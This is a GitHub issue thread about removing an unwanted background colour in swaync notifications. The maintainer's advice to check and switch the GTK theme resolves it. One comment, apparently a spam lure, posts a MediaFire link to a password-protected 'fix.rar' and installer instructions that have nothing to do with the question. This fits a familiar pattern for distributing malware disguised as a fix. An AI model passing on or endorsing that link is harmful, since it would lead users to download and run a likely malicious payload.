### ISSUE TITLE
[Help] How to remove the annoying background of notification-row?

### ISSUE THREAD

**Issue by iamhrigved** [ErikReider/SwayNotificationCenter#469]
How to remove this blue-ish background behind the `Notify-send` message?
![image](https://github.com/user-attachments/assets/dd5a81bb-a2b6-48cb-8770-3834f31dcae6)
![image](https://github.com/user-attachments/assets/33e9f154-42d8-4392-a314-6d3070e8b75d)

I just started to configure `swaync` and saw various dotfiles but I couldn't remove this weird background color.

After a lot of frustration, I decided to just copy-paste the dotfiles I saw. Much to my surprise, this color just didn't go away. This is my last resort to find a solution. Please help me.

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ErikReider** [comment]
How does it look stock? (No CSS modifications)

**Comment by ErikReider** [comment]
What GTK theme are you using?

**Comment by iamhrigved** [comment]
I don't use GTK apps. I have KDE installed in parallel with Hyprland so I only use Qt apps. I don't know much about GTK apps and themes.

**Comment by ErikReider** [comment]
> I don't use GTK apps. I have KDE installed in parallel with Hyprland so I only use Qt apps. I don't know much about GTK apps and themes.

KDE usually applies a custom GTK theme.

Run to get the current theme, should be Adwaita or anything similar.
```zsh
gsettings get org.gnome.desktop.interface gtk-theme
```

If it's not Adwaita, you're on your own. I can sadly not test every different theme that's out there. 

If you run `GTK_DEBUG=interactive swaync` there should be an additional debug window that you can use to determine which CSS classes are used for individual elements :)

**Comment by iamhrigved** [comment]
Thanks for your help! I ran the command you provided and got the output:
```
Breeze
```
So I did
```bash
gsettings set org.gnome.desktop.interface gtk-theme Adwaita
```
That fixed the issue perfectly! I really appreciate your support. This is one of the best notification clients out there—keep up the great work! 👍
